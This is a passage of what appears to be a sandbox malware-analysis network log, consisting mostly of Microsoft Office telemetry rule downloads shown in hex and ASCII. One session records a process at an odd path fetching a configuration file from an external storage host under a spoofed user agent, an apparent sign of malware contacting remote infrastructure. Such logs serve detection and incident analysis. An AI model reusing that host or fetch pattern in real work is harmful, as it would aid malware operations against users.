                                                                                                                  2024-11-14 14:00:55 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  99192.168.2.44986813.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:55 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:55 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:55 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 419
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                  ETag: "0x8DC582BB7F164C3"
                                                                                                                  x-ms-request-id: 513eaac4-201e-0085-0178-3534e3000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140055Z-r178fb8d765tq2dphC1DFW278s00000002dg00000000du68
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:55 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  100192.168.2.44987013.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:55 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:55 UTC491INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:55 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 419
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                  ETag: "0x8DC582B9FF95F80"
                                                                                                                  x-ms-request-id: 842612a7-c01e-00a2-75a0-342327000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140055Z-r178fb8d765kzgrxhC1DFWrsuc00000002f000000000b3y8
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:55 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  101192.168.2.44987413.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:56 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:56 UTC491INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:56 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 468
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                  ETag: "0x8DC582BB3EAF226"
                                                                                                                  x-ms-request-id: 06fd63be-801e-008f-5e01-2d2c5d000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140056Z-16547b76f7fj897nhC1DFWdwq40000000kn00000000072mt
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:56 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  102192.168.2.44987392.53.116.1384437912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:56 UTC208OUTGET /41907bc4-chronocromdocrom/integra/conf.txt HTTP/1.1
                                                                                                                  User-Agent: ler8109.txt
                                                                                                                  Host: s3.timeweb.com
                                                                                                                  If-Modified-Since: Mon, 30 Oct 2023 15:08:01 GMT
                                                                                                                  If-None-Match: "8cc325c4a72b846a690145124f81749a"
                                                                                                                  2024-11-14 14:00:56 UTC474INHTTP/1.1 304 Not Modified
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:56 GMT
                                                                                                                  Connection: close
                                                                                                                  Etag: "8cc325c4a72b846a690145124f81749a"
                                                                                                                  X-Container-Storage-Policy-Index: 0
                                                                                                                  X-Container-Storage-Policy-Name: Policy-0
                                                                                                                  X-Krakend: Version 1.4.1
                                                                                                                  X-Krakend-Completed: false
                                                                                                                  Expires: Thu, 14 Nov 2024 14:01:26 GMT
                                                                                                                  Cache-Control: max-age=30
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Allow-Methods: *
                                                                                                                  Access-Control-Allow-Headers: *
                                                                                                                  Access-Control-Max-Age: 1728000


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  103192.168.2.44987713.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:56 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:56 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:56 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 470
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                  ETag: "0x8DC582BBB181F65"
                                                                                                                  x-ms-request-id: 5110c4ae-601e-0050-54a6-342c9c000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140056Z-r178fb8d765dbczshC1DFW33an00000002e000000000cfpf
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:56 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  104192.168.2.44987513.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:56 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:56 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:56 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 485
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                  ETag: "0x8DC582BB9769355"
                                                                                                                  x-ms-request-id: 9ba15ece-101e-0034-5d08-2c96ff000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140056Z-16547b76f7flf9g6hC1DFWmcx8000000095000000000m013
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:56 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  105192.168.2.44987613.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:56 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:56 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:56 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 411
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                  ETag: "0x8DC582B989AF051"
                                                                                                                  x-ms-request-id: dfccd5b2-501e-00a3-0f60-35c0f2000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140056Z-r178fb8d765ljg7ghC1DFWfk4c00000002eg000000008evw
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:56 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  106192.168.2.44987813.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:56 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:56 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:56 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 427
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                  ETag: "0x8DC582BB556A907"
                                                                                                                  x-ms-request-id: d55876ee-301e-0099-5603-2d6683000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140056Z-16547b76f7fknvdnhC1DFWxnys0000000kv0000000004avk
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:56 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  107192.168.2.44988013.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:57 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:57 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:57 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 502
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                  ETag: "0x8DC582BB6A0D312"
                                                                                                                  x-ms-request-id: 53ebd79e-c01e-0046-4ea1-342db9000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140057Z-r178fb8d765w8fzdhC1DFW8ep400000002n000000000570n
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:57 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  108192.168.2.44988113.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:57 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:57 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:57 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 407
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                  ETag: "0x8DC582B9D30478D"
                                                                                                                  x-ms-request-id: e8b169fe-001e-008d-0840-36d91e000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140057Z-1749fc9bdbdqhv2phC1DFWvd3000000002e000000000knkb
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:57 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  109192.168.2.44988213.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:57 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:57 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:57 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 474
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                  ETag: "0x8DC582BB3F48DAE"
                                                                                                                  x-ms-request-id: 6dc34679-101e-0034-7d01-2d96ff000000
